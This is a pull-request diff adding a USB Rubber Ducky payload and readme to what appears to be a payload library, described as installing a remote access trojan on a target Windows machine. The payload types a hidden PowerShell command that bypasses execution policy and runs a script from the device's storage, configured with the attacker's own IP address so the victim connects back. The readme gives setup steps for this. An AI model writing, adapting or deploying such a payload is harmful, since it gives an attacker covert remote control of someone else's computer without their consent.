Merge 59c5175b3e into b495fcf019

payloads/library/execution/Win_PoSH_RAT/payload.txt

@@ -0,0 +1,41 @@
+REM TITLE R.A.T
+REM AUTHOR TRIBBIC
+REM DESCRIPTION Set up a R.A.T on the target windows machine
+REM DUCKY SCRIPT 3
+
+REM USERNAME to login to the R.A.T
+DEFINE #USERNAME name
+REM Your IP Address use https://www.ipchicken.com/ to get your IP
+DEFINE #IPADDRESS 192.168.1.1
+ATTACKMODE HID STORAGE
+EXTENSION DETECT_READY
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+
+        TARGETS:
+            Any system that reflects CAPSLOCK will detect minimum required delay
+            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #RESPONSE_DELAY 25
+    DEFINE #ITERATION_LIMIT 120
+
+    VAR $C = 0
+    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+        CAPSLOCK
+        DELAY #RESPONSE_DELAY
+        $C = ($C + 1)
+    END_WHILE
+    CAPSLOCK
+END_EXTENSION
+
+GUI r
+DELAY 200
+STRINGLN powershell -Noni -NoP -W h -EP Bypass $U='#USERNAME';$IP='#IPADDRESS'; iex((Get-Volume -FileSystemLabel 'DUCKY').DriveLetter+':\R.ps1')

payloads/library/execution/Win_PoSH_RAT/readme.md

@@ -0,0 +1,22 @@
+# RAT
+- Author: TRIBBIC
+- Version: 1.0
+- Target: Windows 10 (Powershell 5.1+)
+- Category: Execution
+- Attackmode: HID & Storage
+- Ducky Script Version: 3
+
+## Setup
+In the payload.txt change the two DEFINE's
+
+\#USERNAME Should be your login name
+
+\#IPADDRESS Should be your IP Address
+
+## Description
+Create a R.A.T using Windows Powershell on Targets PC
+
+## Change Log
+| Version | Changes         |
+| ------- | --------------- |
+| 1.0     | Initial release |